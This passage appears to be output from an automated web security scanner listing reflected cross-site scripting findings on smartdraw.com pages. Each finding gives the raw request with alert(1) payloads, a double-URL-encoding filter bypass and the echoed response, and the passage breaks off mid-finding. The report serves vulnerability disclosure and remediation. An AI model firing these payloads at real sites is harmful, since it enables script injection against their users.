This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /94da6%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522861bf406f44/charts/x22 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:30:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:30:10 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:30:10 GMT; path=/
Set-Cookie: ASP.NET_SessionId=3yzxhc55ehds33jqb4uatink; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8760
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/94da6"style="x:expression(alert(1))"861bf406f44/charts/x22/&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px;
...[SNIP]...

3.147. http://www.smartdraw.com/examples/charts/x22 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /examples/charts/x22

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a48df%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522d7925e086c3 was submitted in the REST URL parameter 1. This input was echoed as a48df"style="x:expression(alert(1))"d7925e086c3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /examplesa48df%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522d7925e086c3/charts/x22 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:30:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:30:05 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:30:05 GMT; path=/
Set-Cookie: ASP.NET_SessionId=ty0lqe55q5mcnibk2sdorqzz; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8816
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/examplesa48df"style="x:expression(alert(1))"d7925e086c3/charts/x22/" rel="nofollow" target="_blank">
...[SNIP]...

3.148. http://www.smartdraw.com/product/reviews [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /product/reviews

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a543%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522ac716871498 was submitted in the REST URL parameter 1. This input was echoed as 4a543"style="x:expression(alert(1))"ac716871498 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /4a543%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522ac716871498/reviews HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate
Date: Thu, 03 Feb 2011 20:29:31 GMT
Content-Length: 8739
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:31 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:31 GMT; path=/
Set-Cookie: ASP.NET_SessionId=3c4tc255quiohy55truamgmu; path=/; HttpOnly
Pragma: no-cache
Expires: Thu, 03 Feb 2011 20:29:31 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/4a543"style="x:expression(alert(1))"ac716871498/reviews/&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; hei
...[SNIP]...

3.149. http://www.smartdraw.com/product/reviews [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /product/reviews

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7bfab%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522fd877cbaba1 was submitted in the REST URL parameter 1. This input was echoed as 7bfab"style="x:expression(alert(1))"fd877cbaba1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /product7bfab%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522fd877cbaba1/reviews HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:27 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:27 GMT; path=/
Set-Cookie: ASP.NET_SessionId=irozqj45lpljwj55wgoccn55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8788
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/product7bfab"style="x:expression(alert(1))"fd877cbaba1/reviews/" rel="nofollow" target="_blank">
...[SNIP]...

3.150. http://www.smartdraw.com/product/reviews [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /product/reviews

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7aea0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec7ddeeb9a3d was submitted in the REST URL parameter 1. This input was echoed as 7aea0"><script>alert(1)</script>c7ddeeb9a3d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /product7aea0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec7ddeeb9a3d/reviews?id=349540/x22/x3eSmartDraw HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:43 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:43 GMT; path=/
Set-Cookie: ASP.NET_SessionId=1fckz3ilanwcrr45tvw5eu55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8949
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/product7aea0"><script>alert(1)</script>c7ddeeb9a3d/reviews/?id=349540/x22/x3eSmartDraw" rel="nofollow" target="_blank">
...[SNIP]...

3.151. http://www.smartdraw.com/product/reviews [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /product/reviews

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc399%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eaa008f34339 was submitted in the REST URL parameter 1. This input was echoed as cc399"><script>alert(1)</script>aa008f34339 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /cc399%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eaa008f34339/reviews?id=349540/x22/x3eSmartDraw HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:45 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:45 GMT; path=/
Set-Cookie: ASP.NET_SessionId=0vufwvz10dn1v0up3yasccey; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8900
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/cc399"><script>alert(1)</script>aa008f34339/reviews/?id=349540/x22/x3eSmartDraw&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overfl
...[SNIP]...

3.152. http://www.smartdraw.com/product/reviews [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /product/reviews

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a75f4%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25224417cefb817 was submitted in the REST URL parameter 2. This input was echoed as a75f4"style="x:expression(alert(1))"4417cefb817 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /product/a75f4%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25224417cefb817 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:39 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:39 GMT; path=/
Set-Cookie: ASP.NET_SessionId=fv4eqq55u13gyheum3ewifj0; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8739
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/product/a75f4"style="x:expression(alert(1))"4417cefb817/&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:80px
...[SNIP]...

3.153. http://www.smartdraw.com/product/reviews [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /product/reviews

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96803%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edfbbf862323 was submitted in the REST URL parameter 2. This input was echoed as 96803"><script>alert(1)</script>dfbbf862323 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /product/96803%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edfbbf862323?id=349540/x22/x3eSmartDraw HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate
Date: Thu, 03 Feb 2011 20:29:51 GMT
Content-Length: 8900
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:51 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:51 GMT; path=/
Set-Cookie: ASP.NET_SessionId=smkoxh55k01vvq55ighs2efj; path=/; HttpOnly
Pragma: no-cache
Expires: Thu, 03 Feb 2011 20:29:51 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/product/96803"><script>alert(1)</script>dfbbf862323/?id=349540/x22/x3eSmartDraw&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidde
...[SNIP]...

3.154. http://www.smartdraw.com/product/reviews [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /product/reviews

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5bf0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea7aeb62331a was submitted in the REST URL parameter 2. This input was echoed as f5bf0"><script>alert(1)</script>a7aeb62331a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /product/reviewsf5bf0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea7aeb62331a?id=349540/x22/x3eSmartDraw HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:50 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:50 GMT; path=/
Set-Cookie: ASP.NET_SessionId=b4ntfe451a35d0z3actuq255; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8949
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/product/reviewsf5bf0"><script>alert(1)</script>a7aeb62331a/?id=349540/x22/x3eSmartDraw" rel="nofollow" target="_blank">
...[SNIP]...

3.155. http://www.smartdraw.com/product/reviews [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /product/reviews

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6bd2b%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522f1b2d917b08 was submitted in the REST URL parameter 2. This input was echoed as 6bd2b"style="x:expression(alert(1))"f1b2d917b08 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /product/reviews6bd2b%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522f1b2d917b08 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate
Date: Thu, 03 Feb 2011 20:29:36 GMT
Content-Length: 8788
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:36 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:36 GMT; path=/
Set-Cookie: ASP.NET_SessionId=sktfbrnh1dtwviaawiverx45; path=/; HttpOnly
Pragma: no-cache
Expires: Thu, 03 Feb 2011 20:29:36 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/product/reviews6bd2b"style="x:expression(alert(1))"f1b2d917b08/" rel="nofollow" target="_blank">
...[SNIP]...

3.156. http://www.smartdraw.com/product/reviews [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /product/reviews

Issue detail

The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5812"><script>alert(1)</script>d208eaaaa24 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /product/reviews?id=349540/x22/x3eSmartDrawc5812"><script>alert(1)</script>d208eaaaa24 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:29:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:33 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:33 GMT; path=/
Set-Cookie: ASP.NET_SessionId=qrx2kj45eidrpsqxg4kwhg3p; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 11278
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/product/reviews/index.htm?id=349540/x22/x3eSmartDrawc5812"><script>alert(1)</script>d208eaaaa24" rel="nofollow" target="_blank">
...[SNIP]...

3.157. http://www.smartdraw.com/product/reviews [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /product/reviews

Issue detail

The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74b82"><script>alert(1)</script>2e1c8977753 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /product/reviews?id=74b82"><script>alert(1)</script>2e1c8977753 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate
Date: Thu, 03 Feb 2011 20:29:34 GMT
Content-Length: 11117
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:34 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:34 GMT; path=/
Set-Cookie: ASP.NET_SessionId=av1vox3nuhp5qj55p3ucfqnm; path=/; HttpOnly
Pragma: no-cache
Expires: Thu, 03 Feb 2011 20:29:34 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/product/reviews/index.htm?id=74b82"><script>alert(1)</script>2e1c8977753&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:80px;
...[SNIP]...

3.158. http://www.smartdraw.com/product/reviews [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /product/reviews

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dadb8"><script>alert(1)</script>9e1a39efb8f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /product/reviews?dadb8"><script>alert(1)</script>9e1a39efb8f=1 HTTP/1.1
